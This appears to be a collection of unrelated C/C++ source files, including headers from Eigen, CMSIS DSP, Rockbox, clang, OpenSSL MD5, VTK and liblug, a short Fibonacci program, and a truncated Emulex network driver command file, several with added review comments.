#include "src/Core/products/GeneralMatrixMatrix_BLAS.h" #include "src/Core/products/GeneralMatrixVector_BLAS.h" #include "src/Core/products/GeneralMatrixMatrixTriangular_BLAS.h" #include "src/Core/products/SelfadjointMatrixMatrix_BLAS.h" #include "src/Core/products/SelfadjointMatrixVector_BLAS.h" #include "src/Core/products/TriangularMatrixMatrix_BLAS.h" #include "src/Core/products/TriangularMatrixVector_BLAS.h" #include "src/Core/products/TriangularSolverMatrix_BLAS.h" #endif // EIGEN_USE_BLAS #ifdef EIGEN_USE_MKL_VML #include "src/Core/Assign_MKL.h" #endif #include "src/Core/GlobalFunctions.h" #include "src/Core/util/ReenableStupidWarnings.h" #endif // EIGEN_CORE_H
{ "language": "C" }
/* ---------------------------------------------------------------------- * Copyright (C) 2010-2014 ARM Limited. All rights reserved. * * $Date: 19. March 2015 * $Revision: V.1.4.5 * * Project: CMSIS DSP Library * Title: arm_cfft_radix4_init_q15.c * * Description: Radix-4 Decimation in Frequency Q15 FFT & IFFT initialization function * * Target Processor: Cortex-M4/Cortex-M3/Cortex-M0 * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * - Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * - Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * - Neither the name of ARM LIMITED nor the names of its contributors * may be used to endorse or promote products derived from this * software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. 
* -------------------------------------------------------------------- */ #include "arm_math.h" #include "arm_common_tables.h" /** * @ingroup groupTransforms */ /** * @addtogroup ComplexFFT * @{ */ /** * @brief Initialization function for the Q15 CFFT/CIFFT. * @deprecated Do not use this function. It has been superseded by \ref arm_cfft_q15 and will be removed * @param[in,out] *S points to an instance of the Q15 CFFT/CIFFT structure. * @param[in] fftLen length of the FFT. * @param[in] ifftFlag flag that selects forward (ifftFlag=0) or inverse (ifftFlag=1) transform. * @param[in] bitReverseFlag flag that enables (bitReverseFlag=1) or disables (bitReverseFlag=0) bit reversal of output. * @return The function returns ARM_MATH_SUCCESS if initialization is successful or ARM_MATH_ARGUMENT_ERROR if <code>fftLen</code> is not a supported value. * * \par Description: * \par * The parameter <code>ifftFlag</code> controls whether a forward or inverse transform is computed. * Set(=1) ifftFlag for calculation of CIFFT otherwise CFFT is calculated * \par * The parameter <code>bitReverseFlag</code> controls whether output is in normal order or bit reversed order. * Set(=1) bitReverseFlag for output to be in normal order otherwise output is in bit reversed order. * \par * The parameter <code>fftLen</code> Specifies length of CFFT/CIFFT process. Supported FFT Lengths are 16, 64, 256, 1024. * \par * This Function also initializes Twiddle factor table pointer and Bit reversal table pointer. 
*/ arm_status arm_cfft_radix4_init_q15( arm_cfft_radix4_instance_q15 * S, uint16_t fftLen, uint8_t ifftFlag, uint8_t bitReverseFlag) { /* Initialise the default arm status */ arm_status status = ARM_MATH_SUCCESS; /* Initialise the FFT length */ S->fftLen = fftLen; /* Initialise the Twiddle coefficient pointer */ S->pTwiddle = (q15_t *) twiddleCoef_4096_q15; /* Initialise the Flag for selection of CFFT or CIFFT */ S->ifftFlag = ifftFlag; /* Initialise the Flag for calculation Bit reversal or not */ S->bitReverseFlag = bitReverseFlag; /* Initializations of structure parameters depending on the FFT length */ switch (S->fftLen) { case 4096u: /* Initializations of structure parameters for 4096 point FFT */ /* Initialise the twiddle coef modifier value */ S->twidCoefModifier = 1u; /* Initialise the bit reversal table modifier */ S->bitRevFactor = 1u; /* Initialise the bit reversal table pointer */ S->pBitRevTable = (uint16_t *) armBitRevTable; break; case 1024u: /* Initializations of structure parameters for 1024 point FFT */ S->twidCoefModifier = 4u; S->bitRevFactor = 4u; S->pBitRevTable = (uint16_t *) & armBitRevTable[3]; break; case 256u: /* Initializations of structure parameters for 256 point FFT */ S->twidCoefModifier = 16u; S->bitRevFactor = 16u; S->pBitRevTable = (uint16_t *) & armBitRevTable[15]; break; case 64u: /* Initializations of structure parameters for 64 point FFT */ S->twidCoefModifier = 64u; S->bitRevFactor = 64u; S->pBitRevTable = (uint16_t *) & armBitRevTable[63]; break; case 16u: /* Initializations of structure parameters for 16 point FFT */ S->twidCoefModifier = 256u; S->bitRevFactor = 256u; S->pBitRevTable = (uint16_t *) & armBitRevTable[255]; break; default: /* Reporting argument error if fftSize is not valid value */ status = ARM_MATH_ARGUMENT_ERROR; break; } return (status); } /** * @} end of ComplexFFT group */
{ "language": "C" }
/***************************************************************************
 *             __________               __   ___.
 *   Open      \______   \ ____   ____ |  | _\_ |__   _______  ___
 *   Source     |       _//  _ \_/ ___\|  |/ /| __ \ /  _ \  \/  /
 *   Jukebox    |    |   (  <_> )  \___|    < | \_\ (  <_> > <  <
 *   Firmware   |____|_  /\____/ \___  >__|_ \|___  /\____/__/\_ \
 *                     \/            \/     \/    \/            \/
 *
 * Copyright (C) 2013 Lorenzo Miori
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
 * KIND, either express or implied.
 *
 ****************************************************************************/

#ifndef __DEV_IOCTL_YPR0_H__
#define __DEV_IOCTL_YPR0_H__

#include <sys/ioctl.h>
#include "stdint.h"

/**
 * This is the wrapper to r1Bat.ko module with the possible
 * ioctl calls, retrieved by RE
 * The "Fuel gauge" - battery controller - is the MAX17040GT
 */

/* A typical read spans 2 registers: one register address plus the two
 * data bytes of a single 16-bit device register.  Packed so the layout
 * matches what the kernel module expects on the ioctl boundary. */
typedef struct
{
    uint8_t addr;   /* MAX17040 register address */
    uint8_t reg1;   /* first data byte of the 16-bit register
                     * NOTE(review): byte order within the register is not
                     * visible here -- confirm against the r1Bat.ko module */
    uint8_t reg2;   /* second data byte of the 16-bit register */
}__attribute__((packed)) max17040_request;

/* Registers are 16-bit wide */
#define MAX17040_GET_BATTERY_VOLTAGE 0x80045800
#define MAX17040_GET_BATTERY_CAPACITY 0x80045801
#define MAX17040_READ_REG 0x80035803
#define MAX17040_WRITE_REG 0x40035802

/* Prepare the fuel-gauge wrapper for use (presumably opens the device
 * node -- confirm in the corresponding .c file). */
void max17040_init(void);
/* Tear down whatever max17040_init() set up. */
void max17040_close(void);
/* Issue one of the MAX17040_* requests above; data carries the in/out
 * payload.  Returns the underlying ioctl() result. */
int max17040_ioctl(int request, int *data);

#endif /* __DEV_IOCTL_YPR0_H__ */
{ "language": "C" }
#include <bits/stdc++.h>
using namespace std;

/*
 * Answers queries n with the n-th term of a Fibonacci-like sequence
 * (dp[1] = dp[2] = 1, dp[i] = dp[i-1] + dp[i-2]), precomputed once.
 * Reads integers until EOF or a 0 sentinel; prints dp[n] per query.
 */
int main()
{
    const int MAX_N = 100;              // table size; dp[n] valid for 0 <= n < MAX_N
    // dp[0..1] seed the recurrence; the loop fills the rest.
    // NOTE: unsigned long long overflows (wraps) past roughly n = 93.
    unsigned long long dp[MAX_N] = {0, 1};
    for (int i = 2; i < MAX_N; i++)
        dp[i] = dp[i-1] + dp[i-2];

    int n;
    while (scanf("%d", &n) == 1 && n) {
        // BUGFIX: the original indexed dp[n] unchecked, which is an
        // out-of-bounds read (undefined behavior) for n < 0 or n >= 100.
        if (n < 0 || n >= MAX_N)
            continue;                   // silently skip out-of-range queries
        printf("%llu\n", dp[n]);
    }
    return 0;
}
{ "language": "C" }
/*===---- xsaveoptintrin.h - XSAVEOPT intrinsic ----------------------------===
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 *
 *===-----------------------------------------------------------------------===
 */

#ifndef __IMMINTRIN_H
#error "Never use <xsaveoptintrin.h> directly; include <immintrin.h> instead."
#endif

#ifndef __XSAVEOPTINTRIN_H
#define __XSAVEOPTINTRIN_H

/* Define the default attributes for the functions in this file. */
#define __DEFAULT_FN_ATTRS __attribute__((__always_inline__, __nodebug__,  __target__("xsaveopt")))

/* Save the processor extended states selected by the bit mask __m into the
 * buffer at __p, using the optimized XSAVEOPT form.
 * NOTE(review): the XSAVEOPT instruction requires a 64-byte-aligned save
 * area -- callers are presumably responsible for that; confirm against the
 * Intel SDM. */
static __inline__ void __DEFAULT_FN_ATTRS
_xsaveopt(void *__p, unsigned long long __m) {
  __builtin_ia32_xsaveopt(__p, __m);
}

#ifdef __x86_64__
/* 64-bit variant (XSAVEOPT64); same contract as _xsaveopt above. */
static __inline__ void __DEFAULT_FN_ATTRS
_xsaveopt64(void *__p, unsigned long long __m) {
  __builtin_ia32_xsaveopt64(__p, __m);
}
#endif

#undef __DEFAULT_FN_ATTRS

#endif
{ "language": "C" }
/* crypto/md5/md5.h */ /* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com) * All rights reserved. * * This package is an SSL implementation written * by Eric Young (eay@cryptsoft.com). * The implementation was written so as to conform with Netscapes SSL. * * This library is free for commercial and non-commercial use as long as * the following conditions are aheared to. The following conditions * apply to all code found in this distribution, be it the RC4, RSA, * lhash, DES, etc., code; not just the SSL code. The SSL documentation * included with this distribution is covered by the same copyright terms * except that the holder is Tim Hudson (tjh@cryptsoft.com). * * Copyright remains Eric Young's, and as such any Copyright notices in * the code are not to be removed. * If this package is used in a product, Eric Young should be given attribution * as the author of the parts of the library used. * This can be in the form of a textual message at program startup or * in documentation (online or textual) provided with the package. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * "This product includes cryptographic software written by * Eric Young (eay@cryptsoft.com)" * The word 'cryptographic' can be left out if the rouines from the library * being used are not cryptographic related :-). * 4. 
If you include any Windows specific code (or a derivative thereof) from * the apps directory (application code) you must include an acknowledgement: * "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" * * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * The licence and distribution terms for any publically available version or * derivative of this code cannot be changed. i.e. this code cannot simply be * copied and put under another distribution licence * [including the GNU Public Licence.] */ #ifndef HEADER_MD5_H # define HEADER_MD5_H # include <openssl/e_os2.h> # include <stddef.h> #ifdef __cplusplus extern "C" { #endif # ifdef OPENSSL_NO_MD5 # error MD5 is disabled. # endif /* * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! * ! MD5_LONG has to be at least 32 bits wide. If it's wider, then ! * ! MD5_LONG_LOG2 has to be defined along. ! * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! */ # if defined(__LP32__) # define MD5_LONG unsigned long # elif defined(OPENSSL_SYS_CRAY) || defined(__ILP64__) # define MD5_LONG unsigned long # define MD5_LONG_LOG2 3 /* * _CRAY note. I could declare short, but I have no idea what impact * does it have on performance on none-T3E machines. 
I could declare
 * int, but at least on C90 sizeof(int) can be chosen at compile time.
 * So I've chosen long...
 *                                      <appro@fy.chalmers.se>
 */
# else
#  define MD5_LONG unsigned int
# endif

# define MD5_CBLOCK      64
# define MD5_LBLOCK      (MD5_CBLOCK/4)
# define MD5_DIGEST_LENGTH 16

/* Hash context carried across MD5_Init/MD5_Update/MD5_Final calls.
 * NOTE(review): field meanings follow the usual Merkle-Damgard engine
 * layout (A-D = working state words, Nl/Nh = running message length,
 * data = pending input block, num = bytes pending in 'data') -- confirm
 * against md5_dgst.c before relying on this. */
typedef struct MD5state_st {
    MD5_LONG A, B, C, D;
    MD5_LONG Nl, Nh;
    MD5_LONG data[MD5_LBLOCK];
    unsigned int num;
} MD5_CTX;

# ifdef OPENSSL_FIPS
int private_MD5_Init(MD5_CTX *c);
# endif
/* Streaming MD5 interface; see the OpenSSL MD5_Init(3) manual page for
 * the return-value and usage contract. */
int MD5_Init(MD5_CTX *c);
int MD5_Update(MD5_CTX *c, const void *data, size_t len);
int MD5_Final(unsigned char *md, MD5_CTX *c);
/* One-shot digest of d[0..n-1]; result written to md. */
unsigned char *MD5(const unsigned char *d, size_t n, unsigned char *md);
/* Run the compression function on one 64-byte block b. */
void MD5_Transform(MD5_CTX *c, const unsigned char *b);

#ifdef  __cplusplus
}
#endif

#endif
{ "language": "C" }
/*
 * This software is copyrighted as noted below.  It may be freely copied,
 * modified, and redistributed, provided that the copyright notice is
 * preserved on all copies.
 *
 * There is no warranty or other guarantee of fitness for this software,
 * it is provided solely "as is".  Bug reports or fixes may be sent
 * to the author, who may or may not act on them as he desires.
 *
 * You may not include this software in a program or other software product
 * without supplying the source, or without informing the end-user that the
 * source is available for no extra charge.
 *
 * If you modify this software, you should include a notice giving the
 * name of the person performing the modification, the date of modification,
 * and the reason for such modification.
 */
/*
 * error.c - error function.
 *
 * Author:      Raul Rivero
 *              Mathematics Dept.
 *              University of Oviedo
 * Date:        Sat Jan 4 1992
 * Copyright (c) 1992, Raul Rivero
 *
 */

#include "lug.h"

char *MY_NAME = "liblug";
int lugerrno = 0;
/* When nonzero (the default), Error() prints its message and exits. */
int stop_on_error = 1;

/* Error messages indexed by error code; the trailing NULL marks the end.
 * (Message text, including historical typos, is part of the library's
 * observable output and is kept byte-for-byte.) */
char *lug_errlist[] = {
        /*  0 */ "Bad format of usage\n",
        /*  1 */ "Cannot open file\n",
        /*  2 */ "Out of memory\n",
        /*  3 */ "Error while reading input file\n",
        /*  4 */ "Error while writing output file\n",
        /*  5 */ "Unkown input file type\n",
        /*  6 */ "File corrupt ( uncompress too bytes )\n",
        /*  7 */ "File is not a RGB image or gray scaled\n",
        /*  8 */ "Uncompress failed or compressed file don't exist\n",
        /*  9 */ "Unkown encoding type\n",
        /* 10 */ "Incorrect number of planes\n",
        /* 11 */ "Incorrect number of levels for dither\n",
        /* 12 */ "Incorrect size of images\n",
        /* 13 */ "Mapped image without color map ( ?! )\n",
        /* 14 */ "Incorrect image bits ( only 16, 24 or 32 )\n",
        /* 15 */ "File is not a mapped image\n",
        /* 16 */ "Cannot open graphics display\n",
        /* 17 */ "Interlazed image\n",
        /* 18 */ "File contains an uncomplete image\n",
        /* 19 */ "Using an image with MAGIC unset\n",
        /* 20 */ "Standard input not avaible with this format\n",
        /* 21 */ "Cannot get a Tag from the TIFF file\n",
        /* 22 */ "Incorrect resampling values\n",
        /* 23 */ "Image is not RGB/Gray scaled image\n",
        NULL
};

/* Return the message for an error code.  The caller is responsible for
 * passing a valid index (0..23); no bounds checking is performed here,
 * matching the original contract. */
char *lugerrmsg(int code)
{
  return lug_errlist[ code ];
}

/* Record 'code' in lugerrno and, if stop_on_error is set, print the
 * corresponding message to stderr and terminate the process. */
void Error(int code)
{
  static int last = 0;   /* index of the NULL sentinel, computed once */

  lugerrno = code;

  if ( !last ) {
    /*
     * Search, the first time, the last
     * error message (the NULL sentinel).
     */
    for ( ; lug_errlist[last]; last++);
  }

  if ( stop_on_error ) {
    /*
     * Write the error message and
     * stop the program.
     */
    fprintf(stderr, "%s: ", MY_NAME);
    switch ( code ) {
      case 99:
        fprintf(stderr, "Not ready\n");
        break;
      default:
        /* BUGFIX: was 'code <= last'.  'last' indexes the NULL sentinel,
         * so code == last passed the check and fputs(NULL, stderr) was
         * undefined behavior.  The valid range is 0 <= code < last. */
        if ( code >= 0 && code < last ) {
          fputs( lug_errlist[code], stderr );
        } else {
          fprintf( stderr, "Unknown error code (%d)\n", code);
        }
        break;
    }
    exit( 1 );
  }
}
{ "language": "C" }
/*=========================================================================

  Program:   Visualization Toolkit
  Module:    vtkStructuredPoints.h

  Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen
  All rights reserved.
  See Copyright.txt or http://www.kitware.com/Copyright.htm for details.

     This software is distributed WITHOUT ANY WARRANTY; without even
     the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
     PURPOSE.  See the above copyright notice for more information.

=========================================================================*/
/**
 * @class   vtkStructuredPoints
 * @brief   A subclass of ImageData.
 *
 * StructuredPoints is a subclass of ImageData that requires the data extent
 * to exactly match the update extent. Normally image data allows that the
 * data extent may be larger than the update extent.
 * StructuredPoints also defines the origin differently than vtkImageData.
 * For structured points the origin is the location of the first point.
 * Whereas images define the origin as the location of point 0, 0, 0.
 * The image origin is stored in an ivar, and structured points
 * have special methods for setting/getting the origin/extents.
 */

#ifndef vtkStructuredPoints_h
#define vtkStructuredPoints_h

#include "vtkCommonDataModelModule.h" // For export macro
#include "vtkImageData.h"

class VTKCOMMONDATAMODEL_EXPORT vtkStructuredPoints : public vtkImageData
{
public:
  static vtkStructuredPoints* New();
  vtkTypeMacro(vtkStructuredPoints, vtkImageData);

  /**
   * Return the concrete dataset type (VTK_STRUCTURED_POINTS).
   * Exists to simplify filter superclasses.
   */
  int GetDataObjectType() override { return VTK_STRUCTURED_POINTS; }

protected:
  vtkStructuredPoints();
  ~vtkStructuredPoints() override = default;

private:
  // Not implemented: this class is not copyable.
  vtkStructuredPoints(const vtkStructuredPoints&) = delete;
  void operator=(const vtkStructuredPoints&) = delete;
};

#endif

// VTK-HeaderTest-Exclude: vtkStructuredPoints.h
{ "language": "C" }
/* * Copyright (C) 2005 - 2011 Emulex * All rights reserved. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License version 2 * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * * Contact Information: * linux-drivers@emulex.com * * Emulex * 3333 Susan Street * Costa Mesa, CA 92626 */ #include "be.h" #include "be_cmds.h" /* Must be a power of 2 or else MODULO will BUG_ON */ static int be_get_temp_freq = 64; static inline void *embedded_payload(struct be_mcc_wrb *wrb) { return wrb->payload.embedded_payload; } static void be_mcc_notify(struct be_adapter *adapter) { struct be_queue_info *mccq = &adapter->mcc_obj.q; u32 val = 0; if (be_error(adapter)) return; val |= mccq->id & DB_MCCQ_RING_ID_MASK; val |= 1 << DB_MCCQ_NUM_POSTED_SHIFT; wmb(); iowrite32(val, adapter->db + DB_MCCQ_OFFSET); } /* To check if valid bit is set, check the entire word as we don't know * the endianness of the data (old entry is host endian while a new entry is * little endian) */ static inline bool be_mcc_compl_is_new(struct be_mcc_compl *compl) { if (compl->flags != 0) { compl->flags = le32_to_cpu(compl->flags); BUG_ON((compl->flags & CQE_FLAGS_VALID_MASK) == 0); return true; } else { return false; } } /* Need to reset the entire word that houses the valid bit */ static inline void be_mcc_compl_use(struct be_mcc_compl *compl) { compl->flags = 0; } static int be_mcc_compl_process(struct be_adapter *adapter, struct be_mcc_compl *compl) { u16 compl_status, extd_status; /* Just swap the status to host endian; mcc tag is opaquely copied * from mcc_wrb */ be_dws_le_to_cpu(compl, 4); compl_status = (compl->status >> CQE_STATUS_COMPL_SHIFT) & CQE_STATUS_COMPL_MASK; if (((compl->tag0 == OPCODE_COMMON_WRITE_FLASHROM) || (compl->tag0 == OPCODE_COMMON_WRITE_OBJECT)) && (compl->tag1 == CMD_SUBSYSTEM_COMMON)) { adapter->flash_status = 
compl_status;
		complete(&adapter->flash_compl);
	}

	if (compl_status == MCC_STATUS_SUCCESS) {
		if (((compl->tag0 == OPCODE_ETH_GET_STATISTICS) ||
			(compl->tag0 == OPCODE_ETH_GET_PPORT_STATS)) &&
			(compl->tag1 == CMD_SUBSYSTEM_ETH)) {
			/* A stats reply arrived: parse it and clear the
			 * stats-pending flag set when the cmd was fired. */
			be_parse_stats(adapter);
			adapter->stats_cmd_sent = false;
		}
		if (compl->tag0 ==
			OPCODE_COMMON_GET_CNTL_ADDITIONAL_ATTRIBUTES) {
			/* tag1 carries the MCCQ index of the originating wrb
			 * (stashed by be_cmd_get_die_temperature), so the
			 * embedded response can be located again here. */
			struct be_mcc_wrb *mcc_wrb =
				queue_index_node(&adapter->mcc_obj.q,
						compl->tag1);
			struct be_cmd_resp_get_cntl_addnl_attribs *resp =
				embedded_payload(mcc_wrb);
			adapter->drv_stats.be_on_die_temperature =
				resp->on_die_temperature;
		}
	} else {
		if (compl->tag0 == OPCODE_COMMON_GET_CNTL_ADDITIONAL_ATTRIBUTES)
			/* FW rejected the temperature query; stop issuing it */
			be_get_temp_freq = 0;

		if (compl_status == MCC_STATUS_NOT_SUPPORTED ||
			compl_status == MCC_STATUS_ILLEGAL_REQUEST)
			goto done;

		if (compl_status == MCC_STATUS_UNAUTHORIZED_REQUEST) {
			dev_warn(&adapter->pdev->dev, "This domain(VM) is not "
				"permitted to execute this cmd (opcode %d)\n",
				compl->tag0);
		} else {
			extd_status = (compl->status >> CQE_STATUS_EXTD_SHIFT) &
					CQE_STATUS_EXTD_MASK;
			dev_err(&adapter->pdev->dev, "Cmd (opcode %d) failed:"
				"status %d, extd-status %d\n",
				compl->tag0, compl_status, extd_status);
		}
	}
done:
	return compl_status;
}

/* Link state evt is a string of bytes; no need for endian swapping */
static void be_async_link_state_process(struct be_adapter *adapter,
		struct be_async_event_link_state *evt)
{
	/* When link status changes, link speed must be re-queried from FW */
	adapter->link_speed = -1;

	/* For the initial link status do not rely on the ASYNC event as
	 * it may not be received in some cases.
*/ if (adapter->flags & BE_FLAGS_LINK_STATUS_INIT) be_link_status_update(adapter, evt->port_link_status); } /* Grp5 CoS Priority evt */ static void be_async_grp5_cos_priority_process(struct be_adapter *adapter, struct be_async_event_grp5_cos_priority *evt) { if (evt->valid) { adapter->vlan_prio_bmap = evt->available_priority_bmap; adapter->recommended_prio &= ~VLAN_PRIO_MASK; adapter->recommended_prio = evt->reco_default_priority << VLAN_PRIO_SHIFT; } } /* Grp5 QOS Speed evt */ static void be_async_grp5_qos_speed_process(struct be_adapter *adapter, struct be_async_event_grp5_qos_link_speed *evt) { if (evt->physical_port == adapter->port_num) { /* qos_link_speed is in units of 10 Mbps */ adapter->link_speed = evt->qos_link_speed * 10; } } /*Grp5 PVID evt*/ static void be_async_grp5_pvid_state_process(struct be_adapter *adapter, struct be_async_event_grp5_pvid_state *evt) { if (evt->enabled) adapter->pvid = le16_to_cpu(evt->tag) & VLAN_VID_MASK; else adapter->pvid = 0; } static void be_async_grp5_evt_process(struct be_adapter *adapter, u32 trailer, struct be_mcc_compl *evt) { u8 event_type = 0; event_type = (trailer >> ASYNC_TRAILER_EVENT_TYPE_SHIFT) & ASYNC_TRAILER_EVENT_TYPE_MASK; switch (event_type) { case ASYNC_EVENT_COS_PRIORITY: be_async_grp5_cos_priority_process(adapter, (struct be_async_event_grp5_cos_priority *)evt); break; case ASYNC_EVENT_QOS_SPEED: be_async_grp5_qos_speed_process(adapter, (struct be_async_event_grp5_qos_link_speed *)evt); break; case ASYNC_EVENT_PVID_STATE: be_async_grp5_pvid_state_process(adapter, (struct be_async_event_grp5_pvid_state *)evt); break; default: dev_warn(&adapter->pdev->dev, "Unknown grp5 event!\n"); break; } } static inline bool is_link_state_evt(u32 trailer) { return ((trailer >> ASYNC_TRAILER_EVENT_CODE_SHIFT) & ASYNC_TRAILER_EVENT_CODE_MASK) == ASYNC_EVENT_CODE_LINK_STATE; } static inline bool is_grp5_evt(u32 trailer) { return (((trailer >> ASYNC_TRAILER_EVENT_CODE_SHIFT) & ASYNC_TRAILER_EVENT_CODE_MASK) == 
ASYNC_EVENT_CODE_GRP_5);
}

/* Return the next valid completion at the MCC CQ tail and advance the
 * tail; NULL when no new completion has been posted by FW.
 */
static struct be_mcc_compl *be_mcc_compl_get(struct be_adapter *adapter)
{
	struct be_queue_info *mcc_cq = &adapter->mcc_obj.cq;
	struct be_mcc_compl *compl = queue_tail_node(mcc_cq);

	if (be_mcc_compl_is_new(compl)) {
		queue_tail_inc(mcc_cq);
		return compl;
	}
	return NULL;
}

/* Re-arm the MCC CQ so async completions generate events again */
void be_async_mcc_enable(struct be_adapter *adapter)
{
	spin_lock_bh(&adapter->mcc_cq_lock);

	be_cq_notify(adapter, adapter->mcc_obj.cq.id, true, 0);
	adapter->mcc_obj.rearm_cq = true;

	spin_unlock_bh(&adapter->mcc_cq_lock);
}

void be_async_mcc_disable(struct be_adapter *adapter)
{
	adapter->mcc_obj.rearm_cq = false;
}

/* Drain the MCC CQ: dispatch async events, process command completions,
 * then notify the CQ with the number of entries consumed. Returns the
 * status of the last processed command completion (0 if none).
 */
int be_process_mcc(struct be_adapter *adapter)
{
	struct be_mcc_compl *compl;
	int num = 0, status = 0;
	struct be_mcc_obj *mcc_obj = &adapter->mcc_obj;

	spin_lock_bh(&adapter->mcc_cq_lock);
	while ((compl = be_mcc_compl_get(adapter))) {
		if (compl->flags & CQE_FLAGS_ASYNC_MASK) {
			/* Interpret flags as an async trailer */
			if (is_link_state_evt(compl->flags))
				be_async_link_state_process(adapter,
				(struct be_async_event_link_state *) compl);
			else if (is_grp5_evt(compl->flags))
				be_async_grp5_evt_process(adapter,
				compl->flags, compl);
		} else if (compl->flags & CQE_FLAGS_COMPLETED_MASK) {
			status = be_mcc_compl_process(adapter, compl);
			atomic_dec(&mcc_obj->q.used);
		}
		be_mcc_compl_use(compl);
		num++;
	}

	if (num)
		be_cq_notify(adapter, mcc_obj->cq.id, mcc_obj->rearm_cq, num);

	spin_unlock_bh(&adapter->mcc_cq_lock);
	return status;
}

/* Wait till no more pending mcc requests are present */
static int be_mcc_wait_compl(struct be_adapter *adapter)
{
#define mcc_timeout 120000 /* 12s timeout */
	int i, status = 0;
	struct be_mcc_obj *mcc_obj = &adapter->mcc_obj;

	for (i = 0; i < mcc_timeout; i++) {
		if (be_error(adapter))
			return -EIO;

		status = be_process_mcc(adapter);

		if (atomic_read(&mcc_obj->q.used) == 0)
			break;
		udelay(100);
	}
	if (i == mcc_timeout) {
		dev_err(&adapter->pdev->dev, "FW not responding\n");
		adapter->fw_timeout = true;
		return -1;
	}
	return status;
}

/* Notify MCC requests and
wait for completion */ static int be_mcc_notify_wait(struct be_adapter *adapter) { be_mcc_notify(adapter); return be_mcc_wait_compl(adapter); } static int be_mbox_db_ready_wait(struct be_adapter *adapter, void __iomem *db) { int msecs = 0; u32 ready; do { if (be_error(adapter)) return -EIO; ready = ioread32(db); if (ready == 0xffffffff) return -1; ready &= MPU_MAILBOX_DB_RDY_MASK; if (ready) break; if (msecs > 4000) { dev_err(&adapter->pdev->dev, "FW not responding\n"); adapter->fw_timeout = true; be_detect_dump_ue(adapter); return -1; } msleep(1); msecs++; } while (true); return 0; } /* * Insert the mailbox address into the doorbell in two steps * Polls on the mbox doorbell till a command completion (or a timeout) occurs */ static int be_mbox_notify_wait(struct be_adapter *adapter) { int status; u32 val = 0; void __iomem *db = adapter->db + MPU_MAILBOX_DB_OFFSET; struct be_dma_mem *mbox_mem = &adapter->mbox_mem; struct be_mcc_mailbox *mbox = mbox_mem->va; struct be_mcc_compl *compl = &mbox->compl; /* wait for ready to be set */ status = 